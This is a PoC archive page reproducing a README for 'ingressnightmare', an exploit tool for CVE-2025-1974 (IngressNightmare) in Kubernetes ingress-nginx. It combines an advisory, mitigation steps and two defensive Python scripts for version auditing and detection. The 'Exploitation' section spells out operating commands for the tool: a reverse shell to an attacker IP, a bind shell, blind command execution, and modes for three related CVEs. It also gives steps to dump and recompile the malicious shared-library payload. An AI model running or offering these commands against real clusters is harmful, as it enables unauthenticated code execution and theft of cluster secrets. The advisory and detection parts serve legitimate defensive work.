Related vulnerability
Title: Kubernetes ingress-nginx security vulnerability (CVE-2025-1974)
Description: Kubernetes ingress-nginx is the Kubernetes ingress controller open-sourced by the Cloud Native Computing Foundation; it uses NGINX as a reverse proxy and load balancer. Kubernetes ingress-nginx has a security vulnerability: under certain conditions, an unauthenticated attacker with access to the pod network can execute arbitrary code in the context of the ingress-nginx controller, which may lead to disclosure of Secrets.
Description
CVE-2025-1974
Introduction
# IngressNightmare: CVE-2025-1974 - Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX 👻
# 🧾 Description:
This vulnerability allows remote attackers to execute arbitrary code on affected installations of kubernetes/ingress-nginx. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HTTP requests.
It is triggered by sending two requests. The first is a large request whose body NGINX buffers: the NGINX server in the same pod writes the body to a temporary file. The second is a request to the validating admission webhook server, which makes the admission webhook write a temporary nginx config containing an `ssl_engine badso_location;` directive (where `badso_location` is the path of that temporary file). The admission webhook then runs `nginx -t` to check the config, and the config test loads the file as a shared library, which triggers remote code execution in the context of the NGINX server.
# 🎯 Impact:
CVSS v3.1 score: 9.8 (Critical ⚫️)
+ Attackers gain the ability to load shared libraries, achieve RCE within the ingress-nginx pod, and access all cluster secrets, potentially leading to cluster takeover.
+ It is part of a family dubbed IngressNightmare, which includes four other related flaws with similar injection capabilities.
# ✅ Affected Versions:
## Versions affected:
+ All versions < v1.11.0
+ v1.11.0 – v1.11.4
+ v1.12.0
## Patched in:
+ v1.11.5
+ v1.12.1 and newer
# 🚨 Exploitation Path:
1. Upload a malicious .so file using a large HTTP POST to trigger NGINX's client-body buffering.
2. Use a crafted AdmissionReview with injection via annotations to load the file using ssl_engine.
3. Trigger nginx -t, which loads the library, leading to remote code execution in the controller pod.
# 🔧 Mitigation Steps:
1. Upgrade immediately
   + Upgrade to v1.11.5 or v1.12.1+ of ingress-nginx.
2. Temporary workarounds (if patching isn't possible yet)
   + Disable the admission webhook:
     + Helm users: set `controller.admissionWebhooks.enabled=false`.
     + Manual installs: remove the `--validating-webhook` flag and delete the ValidatingWebhookConfiguration.
   + Restrict network access: use network policies to stop pods from reaching the admission webhook; ideally allow access only from the kube-apiserver.
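As an added illustration of the upgrade and workaround steps (example code written for this page, not part of the README or of the ingress-nginx project): a small Python audit that applies the affected-version list to a controller Deployment, reports whether the webhook flag is still set, and builds the NetworkPolicy that confines the webhook port to the API server. It assumes that the image tag carries the upstream release version (v1.11.4 style), that the webhook is enabled by `--validating-webhook` and listens on container port 8443, and that the pods carry the Helm chart labels `app.kubernetes.io/name=ingress-nginx` and `app.kubernetes.io/component=controller`; the sample manifest is constructed.

```python
"""Audit an ingress-nginx Deployment against the affected-version list and build
the NetworkPolicy workaround. Added example; not part of this README or of the
ingress-nginx project. Assumptions: the image tag is the upstream release version
(e.g. v1.11.4), the admission webhook is enabled by --validating-webhook and
listens on container port 8443, and the pods carry the Helm chart labels
app.kubernetes.io/name=ingress-nginx and app.kubernetes.io/component=controller."""
import re


def parse_version(tag: str):
    """'v1.11.4' -> (1, 11, 4); None if the tag is not X.Y.Z."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", tag)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(tag: str) -> bool:
    """Affected per the advisory: everything below v1.11.0, v1.11.0-v1.11.4 and
    v1.12.0. Patched: v1.11.5 on the 1.11 line, v1.12.1 and newer."""
    v = parse_version(tag)
    if v is None:
        raise ValueError(f"unrecognised version tag: {tag!r}")
    if v < (1, 11, 5):
        return True                                # '< v1.11.0' and v1.11.0-v1.11.4
    return v[:2] == (1, 12) and v < (1, 12, 1)     # v1.12.0


def audit_controller(deployment: dict) -> list:
    """Return findings for a Deployment manifest parsed from YAML/JSON into a dict."""
    findings = []
    for c in deployment["spec"]["template"]["spec"]["containers"]:
        image = c["image"].split("@", 1)[0]        # drop an @sha256:... digest
        tag = image.rpartition(":")[2]             # text after the last ':' is the tag
        webhook_on = any(a.startswith("--validating-webhook") for a in c.get("args", []))
        if is_vulnerable(tag):
            findings.append(f"{c['name']}: {tag} is affected, upgrade to v1.11.5 or v1.12.1+")
            if webhook_on:
                findings.append(f"{c['name']}: admission webhook enabled, disable or isolate it until patched")
    return findings


def webhook_network_policy(namespace: str, apiserver_cidr: str) -> dict:
    """NetworkPolicy: only the API server may reach the webhook port (8443).
    The proxy ports 80/443 are listed separately because a policy with
    policyTypes=Ingress denies every ingress flow it does not mention; without
    the second rule the controller would stop receiving traffic."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "ingress-nginx-webhook-apiserver-only", "namespace": namespace},
        "spec": {
            "podSelector": {"matchLabels": {
                "app.kubernetes.io/name": "ingress-nginx",
                "app.kubernetes.io/component": "controller"}},
            "policyTypes": ["Ingress"],
            "ingress": [
                {"from": [{"ipBlock": {"cidr": apiserver_cidr}}],
                 "ports": [{"protocol": "TCP", "port": 8443}]},
                {"ports": [{"protocol": "TCP", "port": 80},
                           {"protocol": "TCP", "port": 443}]},
            ],
        },
    }


# Constructed sample manifest (not taken from a real cluster).
SAMPLE_DEPLOYMENT = {"spec": {"template": {"spec": {"containers": [{
    "name": "controller",
    "image": "registry.k8s.io/ingress-nginx/controller:v1.11.4@sha256:0000",
    "args": ["/nginx-ingress-controller", "--validating-webhook=:8443",
             "--election-id=ingress-nginx-leader"],
}]}}}}

if __name__ == "__main__":
    for finding in audit_controller(SAMPLE_DEPLOYMENT):
        print(finding)
```

The API server CIDR is cluster specific (on many managed clusters the API server is outside the pod network, so an `ipBlock` is the only way to name it); if the controller also exposes a metrics port, add it to the second rule before applying the policy.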
# 🔍 Detection & Monitoring
+ Look for use of ssl_engine or unusual NGINX commands in webhook logs.
+ Use audit trails to check for suspicious AdmissionReview requests.
+ Run Nuclei detection templates to scan externally or internally for vulnerable setups.
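The first two detection items, as an added example (written for this page, not code from the README or from ingress-nginx): a log scan for `ssl_engine` and an AdmissionReview check that flags ingress-nginx annotation values carrying config metacharacters (the auth-url / auth-tls-match-cn style injections) and a `metadata.uid` that is not a plain UUID (the UID injection). The log lines and the AdmissionReview are constructed samples, and the metacharacter set is a heuristic chosen here, not an official signature.

```python
"""Detection helpers for CVE-2025-1974 style admission requests. Added example;
not part of this README or of ingress-nginx. The log lines and the
AdmissionReview below are constructed samples, and SUSPICIOUS_CHARS is a
heuristic, not an official signature."""
import re

ANNOTATION_PREFIX = "nginx.ingress.kubernetes.io/"
# A value containing any of these can terminate or escape the nginx directive
# the controller templates it into.
SUSPICIOUS_CHARS = ("\n", "\r", ";", "#", "{", "}")
UID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")


def scan_log_lines(lines) -> list:
    """Return (line_no, excerpt) for every log line that mentions ssl_engine."""
    return [(n, line.strip()) for n, line in enumerate(lines, 1) if "ssl_engine" in line]


def suspicious_annotations(review: dict) -> list:
    """Return (field, reasons) for ingress-nginx annotations that contain
    metacharacters or an explicit ssl_engine, and for a metadata.uid that is
    not a plain UUID. An empty list means nothing was flagged."""
    meta = review.get("request", {}).get("object", {}).get("metadata", {})
    findings = []
    for key, value in meta.get("annotations", {}).items():
        if not key.startswith(ANNOTATION_PREFIX):
            continue
        reasons = [repr(c) for c in SUSPICIOUS_CHARS if c in value]
        if "ssl_engine" in value:
            reasons.append("ssl_engine")
        if reasons:
            findings.append((key, reasons))
    uid = meta.get("uid", "")
    if uid and not UID_RE.match(uid):
        findings.append(("metadata.uid", ["not a UUID"]))
    return findings


# Constructed samples (not real controller output, not a captured request).
SAMPLE_LOGS = [
    "I0324 10:00:01 admission.go] reviewing Ingress default/demo",
    "I0324 10:00:01 nginx.go] testing config: ssl_engine /tmp/placeholder.so;",
    "I0324 10:00:02 controller.go] backend reload required",
]
SAMPLE_REVIEW = {
    "apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
    "request": {"object": {"kind": "Ingress", "metadata": {
        "name": "demo", "namespace": "default",
        "uid": "12345678-1234-1234-1234-123456789abc",
        "annotations": {
            "nginx.ingress.kubernetes.io/auth-url": "http://auth.internal/check;\nssl_engine x",
            "nginx.ingress.kubernetes.io/rewrite-target": "/",
        }}}},
}

if __name__ == "__main__":
    print(scan_log_lines(SAMPLE_LOGS))
    print(suspicious_annotations(SAMPLE_REVIEW))
```

Run `suspicious_annotations` over the AdmissionReview bodies recorded by API server audit logging (request-level audit policy on `admissionreviews`/`ingresses`), and `scan_log_lines` over the controller pod's logs; a patched controller rejects such values, so a hit on a patched cluster still indicates someone probing for the flaw.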
# ✅ Summary:
CVE-2025-1974 is a severe RCE vulnerability in ingress-nginx's admission controller that enables unauthenticated pod-to-pod attacks resulting in full cluster compromise. The fix is straightforward: upgrade to v1.11.5 or v1.12.1+, or disable/restrict the validating admission webhook. If you manage Kubernetes clusters, treat this as a high urgency patch and remediation effort.
# 💀 Exploitation:
```bash
# reverse shell
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER}
# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER}
# blind command execution
./ingressnightmare -m c -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url
# same as
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
# for CVE-2025-1097 - auth-tls-match-cn injection
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}
# for CVE-2025-1098 - mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid
## Advanced usage
# Send only the admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...
# Send only the upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload
# dry run mode
## dry run to look at the payload .so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run
# dump it with > /tmp/evil.so
## dry run to look at the raw nginx admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...
## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'
## If you get an error like "Exec format error", the payload is not compatible with the target system.
## This may be because the target system is arm64 while the payload is x86_64;
## the libc version and the kernel version may also cause this error.
## This exploit works on a 5.10 kernel without libc.
## recompile the C payload
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingressnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}
```
# ⚠️ Disclaimer:
For educational and research purposes only. Use only against systems you own or have permission to test.
File snapshot
```
[4.0K] /data/pocs/8050628d5a9271fa3e8745648a4f755105fd56b0
├── [ 264] bad_config.conf
├── [ 792] build.yaml
├── [5.1K] danger.c
├── [8.5K] exploit.go
├── [2.0K] go.mod
├── [ 715] goreleaser.yaml
├── [ 15K] go.sum
├── [8.0K] main.go
├── [ 246] Makefile
├── [2.8K] payload.go
├── [5.2K] README.md
└── [2.3K] validate.json
0 directories, 12 files
```
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be reached, please send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.